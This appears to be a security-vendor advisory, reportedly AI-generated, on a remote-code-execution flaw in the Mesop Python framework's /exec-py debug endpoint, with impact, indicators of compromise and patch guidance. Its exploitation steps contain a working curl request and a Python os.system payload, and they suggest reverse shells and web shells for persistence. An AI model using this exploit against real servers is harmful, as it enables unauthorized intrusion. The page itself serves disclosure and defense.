CVE-2026-33057: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-33057 is a critical unauthenticated remote code execution (RCE) vulnerability in the Mesop Python UI framework, affecting all versions up to and including 1.2.2. The flaw resides in a debugging Flask server endpoint (/exec-py) within the ai/sandbox/wsgi_app.py module, which accepts and executes arbitrary base64-encoded Python code without any authentication or input validation. It was published on March 17, 2026, and patched in version 1.2.3. The vulnerability carries a CVSS v3.1 base score of 9.8 (Critical) (GitHub Advisory, Mesop Security Advisory).

Technical details

The root cause is classified as CWE-94 (Improper Control of Generation of Code / Code Injection). The vulnerable ai/sandbox/wsgi_app.py file exposes a Flask route /exec-py that accepts HTTP POST requests containing a code parameter with base64-encoded Python source code. The server decodes the payload using base64.urlsafe_b64decode(), writes it to a file on the host filesystem, and then executes it via execute_module(module_path...) — all without any authentication check, input sanitization, or sandboxing. This testing/debugging infrastructure was inadvertently included in production-distributed packages, making it exploitable by any network-reachable attacker (GitHub Advisory, Mesop Security Advisory).

Impact

Successful exploitation grants an unauthenticated attacker full remote code execution on the host machine with the privileges of the running Mesop service process. This results in complete compromise of confidentiality (arbitrary file read, credential theft), integrity (file creation/modification/deletion, code tampering), and availability (service disruption or destruction). Attackers can establish persistent reverse shells, pivot to other internal systems, or exfiltrate sensitive data, making this vulnerability particularly dangerous for any internet-exposed deployment (GitHub Advisory, Feedly).

Exploitability

A public proof-of-concept (PoC) is included directly in the official security advisory, demonstrating exploitation via a single curl command with a base64-encoded Python payload. As of the time of disclosure, there is no confirmed evidence of active in-the-wild exploitation or known threat actor attribution. The EPSS score is approximately 12.9% (94th percentile), indicating a relatively elevated probability of exploitation. A Nuclei detection template was added to the ProjectDiscovery nuclei-templates repository, further lowering the barrier for automated scanning (GitHub Advisory, Nuclei Templates, Feedly).

Exploitation steps

  1. Reconnaissance: Identify internet-facing Mesop instances running versions ≤1.2.2 using tools like Shodan, Censys, or the ProjectDiscovery Nuclei template for CVE-2026-33057. Look for open ports serving the Flask sandbox server.
  2. Craft payload: Write the desired Python code (e.g., a reverse shell or file write command) and base64-encode it using URL-safe encoding:
import base64
payload = b'import os\nos.system(\'echo "pwned" > /tmp/pwned.txt\')'
print(base64.urlsafe_b64encode(payload).decode())
  1. Send exploit request: Submit the encoded payload via HTTP POST to the /exec-py endpoint with no authentication required:
curl -X POST http://<target_ip>:<port>/exec-py \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "code=aW1wb3J0IG9zCm9zLnN5c3RlbSgnZWNobyAicHduZWQgYnkgYXR0YWNrZXIiID4gL3RtcC9wd25lZC50eHQnKQ=="
  1. Achieve code execution: The server decodes the payload, writes it to a temporary file, and executes it via execute_module(), running the attacker's code with the service account's privileges.
  2. Establish persistence: Use the initial RCE to deploy a reverse shell, add SSH keys, or install a web shell for persistent access and lateral movement (GitHub Advisory, Mesop Security Advisory).

Indicators of compromise

  • Network: Unexpected HTTP POST requests to /exec-py on the Mesop sandbox server port; outbound connections from the Mesop server process to unknown external IPs (potential reverse shell activity).
  • File System: Newly created or modified files in /tmp/ or the application working directory written by the Mesop service account (e.g., /tmp/pwned.txt or temporary Python script files); unexpected scripts or binaries dropped by the service process.
  • Logs: Flask/web server access logs showing POST requests to /exec-py with a code parameter containing base64-encoded strings; error logs indicating Python module execution from unexpected paths.
  • Process: Unusual child processes spawned by the Mesop/Python/Flask process (e.g., /bin/bash, sh, curl, wget, python3) that are not part of normal application behavior; unexpected network connections initiated by the service process (GitHub Advisory, Feedly).

Mitigation and workarounds

The primary remediation is to upgrade Mesop to version 1.2.3 or later, which removes the entire ai/ package and its associated sandbox infrastructure (commit 825f559) (Patch Commit). If immediate patching is not possible, restrict network access to the sandbox server port via firewall rules to trusted internal networks only, and disable or remove the ai/sandbox/ module from any production deployment. Additionally, implement network-level monitoring for POST requests to /exec-py endpoints and consider isolating affected systems until the patch is applied (GitHub Advisory, Feedly).

Community reactions

The vulnerability was reported by researcher liyander and published by the Mesop maintainer richard-to on March 17, 2026. Coverage appeared on security news outlets including The Hacker Wire and Yazoul.net, which highlighted the trivial exploitability of the unauthenticated endpoint. Social media discussion was noted on Mastodon and Bluesky, and the vulnerability was picked up by automated CVE tracking feeds. Cloudflare also added WAF rules for this CVE in their scheduled WAF releases (The Hacker Wire, Yazoul Advisory, Feedly).

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management